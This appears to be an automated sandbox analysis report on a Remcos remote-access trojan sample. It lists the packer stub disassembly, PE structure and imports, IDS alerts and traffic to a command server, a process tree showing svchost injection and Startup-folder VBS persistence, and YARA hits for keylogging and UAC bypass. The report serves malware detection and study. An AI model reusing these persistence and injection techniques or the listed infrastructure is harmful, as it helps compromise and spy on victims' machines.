                  jne 00007F9FD47BE709h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  adc eax, eax
                  jmp 00007F9FD47BE6D6h
                  add ebx, ebx
                  jne 00007F9FD47BE709h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  adc ecx, ecx
                  jmp 00007F9FD47BE754h
                  xor ecx, ecx
                  sub eax, 03h
                  jc 00007F9FD47BE713h
                  shl eax, 08h
                  mov al, byte ptr [esi]
                  inc esi
                  xor eax, FFFFFFFFh
                  je 00007F9FD47BE777h
                  sar eax, 1
                  mov ebp, eax
                  jmp 00007F9FD47BE70Dh
                  add ebx, ebx
                  jne 00007F9FD47BE709h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  jc 00007F9FD47BE6CEh
                  inc ecx
                  add ebx, ebx
                  jne 00007F9FD47BE709h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  jc 00007F9FD47BE6C0h
                  add ebx, ebx
                  jne 00007F9FD47BE709h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  adc ecx, ecx
                  add ebx, ebx
                  jnc 00007F9FD47BE6F1h
                  jne 00007F9FD47BE70Bh
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  jnc 00007F9FD47BE6E6h
                  add ecx, 02h
                  cmp ebp, FFFFFB00h
                  adc ecx, 02h
                  lea edx, dword ptr [edi+ebp]
                  cmp ebp, FFFFFFFCh
                  jbe 00007F9FD47BE710h
                  mov al, byte ptr [edx]

                  Rich Headers

                  Programming Language:
                  • [ASM] VS2013 build 21005
                  • [ C ] VS2013 build 21005
                  • [C++] VS2013 build 21005
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [ASM] VS2013 UPD5 build 40629
                  • [RES] VS2013 build 21005
                  • [LNK] VS2013 UPD5 build 40629

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1bff500x424.rsrc
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x14d0000x72f50.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1c03740xc.rsrc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x14c2940x48UPX1
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  UPX00x10000xf50000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  UPX10xf60000x570000x564005fcb5e9dc3fafe6169a6239ed7042f67False0.9873188405797102data7.935611316659627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x14d0000x740000x734009e6c7904014ead3ac19cf87555242024False0.9930708547993492data7.993884705816442IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_ICON0x14d45c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                  RT_ICON0x14d5880x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                  RT_ICON0x14d6b40x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                  RT_ICON0x14d7e00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.26011560693641617
                  RT_MENU0xc8d380x50emptyEnglishGreat Britain0
                  RT_STRING0xc8d880x594emptyEnglishGreat Britain0
                  RT_STRING0xc931c0x68aemptyEnglishGreat Britain0
                  RT_STRING0xc99a80x490emptyEnglishGreat Britain0
                  RT_STRING0xc9e380x5fcemptyEnglishGreat Britain0
                  RT_STRING0xca4340x65cemptyEnglishGreat Britain0
                  RT_STRING0xcaa900x466emptyEnglishGreat Britain0
                  RT_STRING0xcaef80x158emptyEnglishGreat Britain0
                  RT_RCDATA0x14dd4c0x71cd0data1.0003239453540658
                  RT_GROUP_ICON0x1bfa200x14dataEnglishGreat Britain1.25
                  RT_GROUP_ICON0x1bfa380x14dataEnglishGreat Britain1.25
                  RT_GROUP_ICON0x1bfa500x14dataEnglishGreat Britain1.15
                  RT_GROUP_ICON0x1bfa680x14dataEnglishGreat Britain1.25
                  RT_VERSION0x1bfa800xdcdataEnglishGreat Britain0.6181818181818182
                  RT_MANIFEST0x1bfb600x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                  Imports

                  DLLImport
                  KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                  ADVAPI32.dllGetAce
                  COMCTL32.dllImageList_Remove
                  COMDLG32.dllGetOpenFileNameW
                  GDI32.dllLineTo
                  IPHLPAPI.DLLIcmpSendEcho
                  MPR.dllWNetUseConnectionW
                  ole32.dllCoGetObject
                  OLEAUT32.dllVariantInit
                  PSAPI.DLLGetProcessMemoryInfo
                  SHELL32.dllDragFinish
                  USER32.dllGetDC
                  USERENV.dllLoadUserProfileW
                  UxTheme.dllIsThemeActive
                  VERSION.dllVerQueryValueW
                  WININET.dllFtpOpenFileW
                  WINMM.dlltimeGetTime
                  WSOCK32.dllconnect

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishGreat Britain

                  Network Behavior

                  Suricata IDS Alerts

                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2024-09-06T21:56:59.201852+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54970445.95.169.1042404TCP
                  2024-09-06T21:57:23.529980+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54972145.95.169.1042404TCP
                  2024-09-06T21:57:23.529980+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54972245.95.169.1042404TCP

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Sep 6, 2024 21:56:58.460700989 CEST497042404192.168.2.545.95.169.104
                  Sep 6, 2024 21:56:58.465568066 CEST24044970445.95.169.104192.168.2.5
                  Sep 6, 2024 21:56:58.465643883 CEST497042404192.168.2.545.95.169.104
                  Sep 6, 2024 21:56:58.477237940 CEST497042404192.168.2.545.95.169.104
                  Sep 6, 2024 21:56:58.482157946 CEST24044970445.95.169.104192.168.2.5
                  Sep 6, 2024 21:56:59.157486916 CEST24044970445.95.169.104192.168.2.5
                  Sep 6, 2024 21:56:59.201852083 CEST497042404192.168.2.545.95.169.104
                  Sep 6, 2024 21:56:59.311888933 CEST24044970445.95.169.104192.168.2.5
                  Sep 6, 2024 21:56:59.316292048 CEST497042404192.168.2.545.95.169.104
                  Sep 6, 2024 21:56:59.321089029 CEST24044970445.95.169.104192.168.2.5
                  Sep 6, 2024 21:56:59.321161985 CEST497042404192.168.2.545.95.169.104
                  Sep 6, 2024 21:56:59.326046944 CEST24044970445.95.169.104192.168.2.5
                  Sep 6, 2024 21:57:00.001950026 CEST24044970445.95.169.104192.168.2.5
                  Sep 6, 2024 21:57:00.003623962 CEST497042404192.168.2.545.95.169.104
                  Sep 6, 2024 21:57:00.008390903 CEST24044970445.95.169.104192.168.2.5
                  Sep 6, 2024 21:57:00.155252934 CEST24044970445.95.169.104192.168.2.5
                  Sep 6, 2024 21:57:00.201827049 CEST497042404192.168.2.545.95.169.104
                  Sep 6, 2024 21:57:22.795455933 CEST497212404192.168.2.545.95.169.104
                  Sep 6, 2024 21:57:22.798368931 CEST497222404192.168.2.545.95.169.104
                  Sep 6, 2024 21:57:22.800288916 CEST24044972145.95.169.104192.168.2.5
                  Sep 6, 2024 21:57:22.800352097 CEST497212404192.168.2.545.95.169.104
                  Sep 6, 2024 21:57:22.803178072 CEST24044972245.95.169.104192.168.2.5
                  Sep 6, 2024 21:57:22.803235054 CEST497222404192.168.2.545.95.169.104
                  Sep 6, 2024 21:57:22.804219961 CEST497212404192.168.2.545.95.169.104
                  Sep 6, 2024 21:57:22.807635069 CEST497222404192.168.2.545.95.169.104
                  Sep 6, 2024 21:57:22.809112072 CEST24044972145.95.169.104192.168.2.5
                  Sep 6, 2024 21:57:22.812450886 CEST24044972245.95.169.104192.168.2.5
                  Sep 6, 2024 21:57:23.474173069 CEST24044972245.95.169.104192.168.2.5
                  Sep 6, 2024 21:57:23.477284908 CEST24044972145.95.169.104192.168.2.5
                  Sep 6, 2024 21:57:23.529979944 CEST497212404192.168.2.545.95.169.104
                  Sep 6, 2024 21:57:23.529979944 CEST497222404192.168.2.545.95.169.104
                  Sep 6, 2024 21:57:23.620095015 CEST24044972245.95.169.104192.168.2.5
                  Sep 6, 2024 21:57:23.622539997 CEST24044972145.95.169.104192.168.2.5
                  Sep 6, 2024 21:57:23.670605898 CEST497222404192.168.2.545.95.169.104
                  Sep 6, 2024 21:57:23.670624018 CEST497212404192.168.2.545.95.169.104
                  Sep 6, 2024 21:57:27.905349016 CEST497042404192.168.2.545.95.169.104
                  Sep 6, 2024 21:57:27.905464888 CEST497212404192.168.2.545.95.169.104
                  Sep 6, 2024 21:57:27.905503035 CEST497222404192.168.2.545.95.169.104

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:15:56:52
                  Start date:06/09/2024
                  Path:C:\Users\user\Desktop\jv4ri.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\jv4ri.exe"
                  Imagebase:0xc70000
                  File size:826'368 bytes
                  MD5 hash:B17E1003BB9BBE58E090C7752447C016
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:2
                  Start time:15:56:54
                  Start date:06/09/2024
                  Path:C:\Users\user\AppData\Local\directory\name.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\jv4ri.exe"
                  Imagebase:0x20000
                  File size:826'368 bytes
                  MD5 hash:B17E1003BB9BBE58E090C7752447C016
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 42%, ReversingLabs
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:3
                  Start time:15:56:55
                  Start date:06/09/2024
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\Desktop\jv4ri.exe"
                  Imagebase:0x170000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:4
                  Start time:15:56:55
                  Start date:06/09/2024
                  Path:C:\Users\user\AppData\Local\directory\name.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                  Imagebase:0x20000
                  File size:826'368 bytes
                  MD5 hash:B17E1003BB9BBE58E090C7752447C016
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:5
                  Start time:15:56:57
                  Start date:06/09/2024
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                  Imagebase:0x170000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2348733537.000000000522F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2348427875.0000000003400000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2348445947.0000000003412000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:8
                  Start time:15:56:58
                  Start date:06/09/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 736
                  Imagebase:0xee0000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:10
                  Start time:15:57:08
                  Start date:06/09/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                  Imagebase:0x7ff75af90000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:11
                  Start time:15:57:08
                  Start date:06/09/2024
                  Path:C:\Users\user\AppData\Local\directory\name.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                  Imagebase:0x20000
                  File size:826'368 bytes
                  MD5 hash:B17E1003BB9BBE58E090C7752447C016
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:12
                  Start time:15:57:09
                  Start date:06/09/2024
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                  Imagebase:0x170000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2181376722.0000000003000000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:16
                  Start time:15:57:21
                  Start date:06/09/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 784
                  Imagebase:0xee0000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:3.8%
                    Dynamic/Decrypted Code Coverage:0.4%
                    Signature Coverage:8.5%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:63
                    execution_graph 98900 c71066 98905 c7f8cf 98900->98905 98902 c7106c 98938 c92f80 98902->98938 98906 c7f8f0 98905->98906 98941 c90143 98906->98941 98910 c7f937 98951 c777c7 98910->98951 98913 c777c7 59 API calls 98914 c7f94b 98913->98914 98915 c777c7 59 API calls 98914->98915 98916 c7f955 98915->98916 98917 c777c7 59 API calls 98916->98917 98918 c7f993 98917->98918 98919 c777c7 59 API calls 98918->98919 98920 c7fa5e 98919->98920 98956 c860e7 98920->98956 98924 c7fa90 98925 c777c7 59 API calls 98924->98925 98926 c7fa9a 98925->98926 98984 c8ffde 98926->98984 98928 c7fae1 98929 c7faf1 GetStdHandle 98928->98929 98930 c7fb3d 98929->98930 98931 cb49d5 98929->98931 98932 c7fb45 OleInitialize 98930->98932 98931->98930 98933 cb49de 98931->98933 98932->98902 98991 cd6dda 64 API calls Mailbox 98933->98991 98935 cb49e5 98992 cd74a9 CreateThread 98935->98992 98937 cb49f1 CloseHandle 98937->98932 99064 c92e84 98938->99064 98940 c71076 98993 c9021c 98941->98993 98944 c9021c 59 API calls 98945 c90185 98944->98945 98946 c777c7 59 API calls 98945->98946 98947 c90191 98946->98947 99000 c77d2c 98947->99000 98949 c7f8f6 98950 c903a2 6 API calls 98949->98950 98950->98910 98952 c90ff6 Mailbox 59 API calls 98951->98952 98953 c777e8 98952->98953 98954 c90ff6 Mailbox 59 API calls 98953->98954 98955 c777f6 98954->98955 98955->98913 98957 c777c7 59 API calls 98956->98957 98958 c860f7 98957->98958 98959 c777c7 59 API calls 98958->98959 98960 c860ff 98959->98960 99059 c85bfd 98960->99059 98963 c85bfd 59 API calls 98964 c8610f 98963->98964 98965 c777c7 59 API calls 98964->98965 98966 c8611a 98965->98966 98967 c90ff6 Mailbox 59 API calls 98966->98967 98968 c7fa68 98967->98968 98969 c86259 98968->98969 98970 c86267 98969->98970 98971 c777c7 59 API calls 98970->98971 98972 c86272 98971->98972 98973 c777c7 59 API calls 98972->98973 98974 c8627d 98973->98974 98975 c777c7 59 API calls 98974->98975 98976 c86288 98975->98976 98977 c777c7 59 API calls 98976->98977 98978 c86293 98977->98978 98979 c85bfd 59 API calls 98978->98979 98980 c8629e 98979->98980 98981 c90ff6 Mailbox 59 API calls 98980->98981 98982 c862a5 RegisterClipboardFormatW 98981->98982 98982->98924 98985 c8ffee 98984->98985 98986 cc5cc3 98984->98986 98988 c90ff6 Mailbox 59 API calls 98985->98988 99062 cd9d71 60 API calls 98986->99062 98990 c8fff6 98988->98990 98989 cc5cce 98990->98928 98991->98935 98992->98937 99063 cd748f 65 API calls 98992->99063 98994 c777c7 59 API calls 98993->98994 98995 c90227 98994->98995 98996 c777c7 59 API calls 98995->98996 98997 c9022f 98996->98997 98998 c777c7 59 API calls 98997->98998 98999 c9017b 98998->98999 98999->98944 99001 c77da5 99000->99001 99002 c77d38 __NMSG_WRITE 99000->99002 99013 c77e8c 99001->99013 99004 c77d73 99002->99004 99005 c77d4e 99002->99005 99010 c78189 99004->99010 99009 c78087 59 API calls Mailbox 99005->99009 99008 c77d56 _memmove 99008->98949 99009->99008 99017 c90ff6 99010->99017 99012 c78193 99012->99008 99014 c77e9a 99013->99014 99016 c77ea3 _memmove 99013->99016 99014->99016 99055 c77faf 99014->99055 99016->99008 99020 c90ffe 99017->99020 99019 c91018 99019->99012 99020->99019 99022 c9101c std::exception::exception 99020->99022 99027 c9594c 99020->99027 99044 c935e1 RtlDecodePointer 99020->99044 99045 c987db RaiseException 99022->99045 99024 c91046 99046 c98711 58 API calls _free 99024->99046 99026 c91058 99026->99012 99028 c959c7 99027->99028 99031 c95958 99027->99031 99053 c935e1 RtlDecodePointer 99028->99053 99030 c959cd 99054 c98d68 58 API calls __getptd_noexit 99030->99054 99034 c9598b RtlAllocateHeap 99031->99034 99036 c95963 99031->99036 99038 c959b3 99031->99038 99042 c959b1 99031->99042 99050 c935e1 RtlDecodePointer 99031->99050 99034->99031 99035 c959bf 99034->99035 99035->99020 99036->99031 99047 c9a3ab 58 API calls __NMSG_WRITE 99036->99047 99048 c9a408 58 API calls 6 library calls 99036->99048 99049 c932df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99036->99049 99051 c98d68 58 API calls __getptd_noexit 99038->99051 99052 c98d68 58 API calls __getptd_noexit 99042->99052 99044->99020 99045->99024 99046->99026 99047->99036 99048->99036 99050->99031 99051->99042 99052->99035 99053->99030 99054->99035 99056 c77fc2 99055->99056 99058 c77fbf _memmove 99055->99058 99057 c90ff6 Mailbox 59 API calls 99056->99057 99057->99058 99058->99016 99060 c777c7 59 API calls 99059->99060 99061 c85c05 99060->99061 99061->98963 99062->98989 99065 c92e90 _raise 99064->99065 99072 c93457 99065->99072 99071 c92eb7 _raise 99071->98940 99089 c99e4b 99072->99089 99074 c92e99 99075 c92ec8 RtlDecodePointer RtlDecodePointer 99074->99075 99076 c92ef5 99075->99076 99077 c92ea5 99075->99077 99076->99077 99135 c989e4 59 API calls _raise 99076->99135 99086 c92ec2 99077->99086 99079 c92f58 RtlEncodePointer RtlEncodePointer 99079->99077 99080 c92f2c 99080->99077 99084 c92f46 RtlEncodePointer 99080->99084 99137 c98aa4 61 API calls 2 library calls 99080->99137 99081 c92f07 99081->99079 99081->99080 99136 c98aa4 61 API calls 2 library calls 99081->99136 99084->99079 99085 c92f40 99085->99077 99085->99084 99138 c93460 99086->99138 99090 c99e5c 99089->99090 99091 c99e6f RtlEnterCriticalSection 99089->99091 99096 c99ed3 99090->99096 99091->99074 99093 c99e62 99093->99091 99120 c932f5 58 API calls 3 library calls 99093->99120 99097 c99edf _raise 99096->99097 99098 c99ee8 99097->99098 99099 c99f00 99097->99099 99121 c9a3ab 58 API calls __NMSG_WRITE 99098->99121 99112 c99f21 _raise 99099->99112 99124 c98a5d 58 API calls 2 library calls 99099->99124 99101 c99eed 99122 c9a408 58 API calls 6 library calls 99101->99122 99104 c99f15 99106 c99f2b 99104->99106 99107 c99f1c 99104->99107 99105 c99ef4 99123 c932df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99105->99123 99110 c99e4b __lock 58 API calls 99106->99110 99125 c98d68 58 API calls __getptd_noexit 99107->99125 99113 c99f32 99110->99113 99112->99093 99114 c99f3f 99113->99114 99115 c99f57 99113->99115 99126 c9a06b InitializeCriticalSectionAndSpinCount 99114->99126 99127 c92f95 99115->99127 99118 c99f4b 99133 c99f73 RtlLeaveCriticalSection _doexit 99118->99133 99121->99101 99122->99105 99124->99104 99125->99112 99126->99118 99128 c92fc7 __dosmaperr 99127->99128 99129 c92f9e RtlFreeHeap 99127->99129 99128->99118 99129->99128 99130 c92fb3 99129->99130 99134 c98d68 58 API calls __getptd_noexit 99130->99134 99132 c92fb9 GetLastError 99132->99128 99133->99112 99134->99132 99135->99081 99136->99080 99137->99085 99141 c99fb5 RtlLeaveCriticalSection 99138->99141 99140 c92ec7 99140->99071 99141->99140 99142 31423b0 99156 3140000 99142->99156 99144 3142492 99159 31422a0 99144->99159 99162 31434e0 GetPEB 99156->99162 99158 314068b 99158->99144 99160 31422a9 Sleep 99159->99160 99161 31422b7 99160->99161 99163 314350a 99162->99163 99163->99158 99164 c7b56e 99171 c8fb84 99164->99171 99166 c7b584 